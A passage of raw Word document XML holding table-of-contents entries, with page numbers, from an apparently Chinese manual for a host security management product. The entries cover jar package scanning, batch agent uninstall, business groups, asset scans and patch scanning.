                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc115166146 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>123</w:t>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="6EFC6B19" w14:textId="42278196" w:rsidR="007E0888" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
              <w:szCs w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc115166147" w:history="1">
            <w:r w:rsidR="007E0888" w:rsidRPr="00F8775E">
              <w:rPr>
                <w:rStyle w:val="af6"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.17 jar包信息</w:t>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc115166147 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>124</w:t>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="64A58063" w14:textId="26D47671" w:rsidR="007E0888" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="10076"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc115166148" w:history="1">
            <w:r w:rsidR="007E0888" w:rsidRPr="00F8775E">
              <w:rPr>
                <w:rStyle w:val="af6"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.17.1 jar包信息查询结果</w:t>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc115166148 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>124</w:t>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="3C3B3BCB" w14:textId="19C782F0" w:rsidR="007E0888" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="10076"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc115166149" w:history="1">
            <w:r w:rsidR="007E0888" w:rsidRPr="00F8775E">
              <w:rPr>
                <w:rStyle w:val="af6"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.17.2 jar包信息扫描</w:t>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc115166149 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>127</w:t>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="4771AED1" w14:textId="587A53C7" w:rsidR="007E0888" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="10076"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc115166150" w:history="1">
            <w:r w:rsidR="007E0888" w:rsidRPr="00F8775E">
              <w:rPr>
                <w:rStyle w:val="af6"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.17.3 jar包信息查询扫描状态</w:t>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc115166150 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>129</w:t>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="6F4C5A1F" w14:textId="249708C5" w:rsidR="007E0888" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
              <w:szCs w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc115166151" w:history="1">
            <w:r w:rsidR="007E0888" w:rsidRPr="00F8775E">
              <w:rPr>
                <w:rStyle w:val="af6"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.18 批量卸载Agent</w:t>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc115166151 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>129</w:t>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="5F2A3B11" w14:textId="7422BBBE" w:rsidR="007E0888" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="10076"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc115166152" w:history="1">
            <w:r w:rsidR="007E0888" w:rsidRPr="00F8775E">
              <w:rPr>
                <w:rStyle w:val="af6"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.18.1 卸载主机</w:t>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc115166152 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>129</w:t>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="7228D2EA" w14:textId="7AA29821" w:rsidR="007E0888" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
              <w:szCs w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc115166153" w:history="1">
            <w:r w:rsidR="007E0888" w:rsidRPr="00F8775E">
              <w:rPr>
                <w:rStyle w:val="af6"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.19 批量创建业务组</w:t>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc115166153 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>132</w:t>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="23304FC0" w14:textId="4A41968E" w:rsidR="007E0888" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="10076"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc115166154" w:history="1">
            <w:r w:rsidR="007E0888" w:rsidRPr="00F8775E">
              <w:rPr>
                <w:rStyle w:val="af6"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.19.1 批量创建linux|windows业务组</w:t>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc115166154 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>133</w:t>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="0F702C3B" w14:textId="7C151D16" w:rsidR="007E0888" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="10076"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc115166155" w:history="1">
            <w:r w:rsidR="007E0888" w:rsidRPr="00F8775E">
              <w:rPr>
                <w:rStyle w:val="af6"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.19.2 查询所有linux|windows业务组</w:t>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc115166155 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>140</w:t>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="5D5D7EBE" w14:textId="5E2AF849" w:rsidR="007E0888" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
              <w:szCs w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc115166156" w:history="1">
            <w:r w:rsidR="007E0888" w:rsidRPr="00F8775E">
              <w:rPr>
                <w:rStyle w:val="af6"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.20 全部资产批量更新扫描</w:t>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc115166156 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>143</w:t>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="66D41869" w14:textId="2EE7D046" w:rsidR="007E0888" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
              <w:szCs w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc115166157" w:history="1">
            <w:r w:rsidR="007E0888" w:rsidRPr="00F8775E">
              <w:rPr>
                <w:rStyle w:val="af6"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.21 移动主机业务组</w:t>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc115166157 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>144</w:t>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="71B968BB" w14:textId="3F7B00F1" w:rsidR="007E0888" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:bCs w:val="0"/>
              <w:noProof/>
              <w:color w:val="auto"/>
              <w:sz w:val="21"/>
              <w:szCs w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc115166158" w:history="1">
            <w:r w:rsidR="007E0888" w:rsidRPr="00F8775E">
              <w:rPr>
                <w:rStyle w:val="af6"/>
                <w:noProof/>
              </w:rPr>
              <w:t>4 风险发现</w:t>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc115166158 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>147</w:t>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="70F3C00C" w14:textId="40553AFF" w:rsidR="007E0888" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
              <w:szCs w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc115166159" w:history="1">
            <w:r w:rsidR="007E0888" w:rsidRPr="00F8775E">
              <w:rPr>
                <w:rStyle w:val="af6"/>
                <w:noProof/>
              </w:rPr>
              <w:t>4.1 安全补丁</w:t>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc115166159 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>147</w:t>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="521B7EC6" w14:textId="1580656A" w:rsidR="007E0888" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="10076"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc115166160" w:history="1">
            <w:r w:rsidR="007E0888" w:rsidRPr="00F8775E">
              <w:rPr>
                <w:rStyle w:val="af6"/>
                <w:noProof/>
              </w:rPr>
              <w:t>4.1.1 补丁扫描</w:t>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc115166160 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>147</w:t>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="03DB59DC" w14:textId="630AE7BC" w:rsidR="007E0888" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="10076"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc115166161" w:history="1">
            <w:r w:rsidR="007E0888" w:rsidRPr="00F8775E">
              <w:rPr>
                <w:rStyle w:val="af6"/>
                <w:noProof/>
              </w:rPr>
              <w:t>4.1.2 查询补丁扫描执行状态</w:t>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc115166161 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>148</w:t>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="1112FDEE" w14:textId="7CA79045" w:rsidR="007E0888" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="10076"/>
            </w:tabs>
            <w:rPr>
